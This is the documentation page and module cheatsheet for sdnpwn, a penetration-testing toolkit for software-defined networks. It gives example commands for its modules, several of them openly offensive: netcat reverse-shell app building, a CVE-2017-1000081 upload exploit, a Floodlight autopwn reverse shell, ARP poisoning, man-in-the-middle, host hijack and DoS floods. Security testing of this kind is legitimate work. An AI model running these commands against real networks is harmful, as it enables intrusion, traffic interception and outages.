Get sdnpwn

The latest version of sdnpwn can be found on Github.

Now available on BlackArch Linux!

Getting Started

The basic usage of sdnpwn is like so:

./ <module name> <options>

An article introducing sdnpwn and it’s basic usage can be found here.

Module Cheatsheet

Functionality in sdnpwn is separated into different modules. Each module is responsible for a particular attack or action. See below for example usage of each module.


  • arpmon
    ./ arpmon -i eth0 -m watch #Dump information from ARP traffic seen at interface eth0 
    ./ arpmon -i eth0 -m map #Map MAC addresses to IP addresses
  • sdn-detect
    ./ sdn-detect #Test using default gateway with ARP traffic
    ./ sdn-detect -t -m icmp #Test using host using ICMP traffic
    ./ sdn-detect -c 100 -v #Test using 100 ARP messages. Print additional output.
  • controller-detect
    ./ controller-detect -i eth0 --lldp #Test usign observed LLDP messages at interface eth0
    ./ controller-detect -t #Test NB Inter. of controller at
  • of-scan
    ./ of-scan -t #Scan default ports 6633 and 6653 for OpenFlow service
    ./ of-scan -t -p 1000-10000 #Scan port range for OpenFlow service


  • help
    ./ help #Print sdnpwn help
  • mods
    ./ mods #Print a list of all executable modules
    ./ mods -s lfa #Search modules for a module with "lfa" in it's name
    ./ mods -n new-mod #Create a new module named "new-mod"
    ./ mods -r new-mod #Remove module named "new-mod"
  • info
    ./ info test-mod #Print information for module named "test-mod"
  • system
    ./ system ifconfig #Run ifconfig command on the system


  • lfa-relay
    ./ lfa-relay --iface1 eth0 --iface2 eth1 --relay bridge #Relay LLDP frames between eth0 and eth1
    ./ lfa-relay --iface1 eth0 --iface2 eth1 --relay tunnel \
     --tunnel-local --tunnel-remote #Relay LLDP frames through a remote tunnel
  • lfa-scapy
    ./ lfa-scapy --iface1 eth0 --iface2 eth1 #Relay LLDP frames between eth0 and eth1
    ./ lfa-scapy --iface1 eth0 --iface2 eth1 --script #Pass relayed traffic through a custom script
  • lldp-replay
    ./ lldp-replay -i eth0 -w lldpcap.cap #Capture LLDP frame to file lldpcap.cap
    ./ lldp-replay -i eth0 -r lldpcap.cap #Replay LLDP frame from file lldpcap.cap
  • host-location-hijack
    ./ host-location-hijack --iface eth0 --target #Hijack location of
  • of-switch
    ./ of-switch -c -p 6653 --config confs/of-switch.conf #Connect to controller at on port 6653 using of-switch.conf configuration
    ./ of-switch -c -p 6653 --config confs/of-switch.conf -l 8888 #Open relay proxy on port 8888
    ./ of-switch -c -p 6653 --config confs/of-switch.conf -o eth0 #Output packet-out payloads to eth0
  • of-gen
    ./ of-gen -t -p 6633 --hello #Send OF Hello message to 
    ./ of-gen -t -p 6633 -c 1000 -d .001 --hello #Flood OF Hello messages 
    ./ of-gen -t -p 6633 --packet-in --xid 0 --buffer-id 0 --in-port 1 \
     --reason action --total-length 65353 --data-scapy "Ether()/IP()/TCP()" #Send arbitrary packet-in message
  • onos-app
    ./ onos-app -b apps/onos-nc-reverse-shell #Build netcat based reverse shell app from template
    ./ onos-app -b apps/onos-nc-reverse-shell -c #Modify configuration for app before build
    ./ onos-app -b apps/onos-nc-reverse-shell -k #Build app and keep source folder
  • onos-app-upload
    ./ onos-app-upload -t -p 8181 -a apps/compiled_apps/securearp.oar #Exploit CVE-2017-1000081 to upload app from compiled apps folder
  • floodlight-debug-autopwn
    ./ floodlight-debug-autopwn -t -l #Set up listener and get reverse shell on port 8888
    ./ floodlight-debug-autopwn -t -r #Do not set up a listener. Use this if you're using another program to listen for the shell
  • dp-arp-poison
    ./ dp-arp-poison -i eth0 -v -t -m de:ad:be:ef:ba:11 #Poison in ARP cache of with MAC of de:ad:be:ef:ba:11
  • dp-mitm
    ./ dp-mitm --iface eth0 --target1 --gateway #MITM connection from target to gateway
  • phantom-host-scan
    ./ phantom-host-scan --iface eth0 --target-ip --ports 22,23 --phantom-ip #Scan ports 22 and 23 using the phantom host scan
  • phantom-storm
    ./ phantom-storm --iface eth0 --target --phantom-ip --packets 1000 #Launch phantom storm DoS attack against network with 1000 packets